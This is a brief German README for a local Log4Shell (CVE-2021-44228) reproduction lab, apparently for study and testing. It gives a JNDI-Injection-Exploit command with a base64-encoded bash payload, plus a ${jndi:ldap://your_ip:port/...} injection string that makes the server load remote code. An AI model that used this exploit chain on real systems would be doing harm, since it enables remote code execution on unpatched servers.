
CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228-Schwachstellen-Reproduktionsumgebung
Nach dem Start des Projekts aufrufen: http://127.0.0.1:9090/vul
JDK-Version: java8u92 (vermeide zu hohe Versionen, es wird empfohlen, dieselbe wie ich zu verwenden, höhere Versionen haben gewisse Einschränkungen für JNDI-Injection)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9yfQ==}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Generiere mit dem obigen Tool den PAYLOAD.
Rufe http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx} auf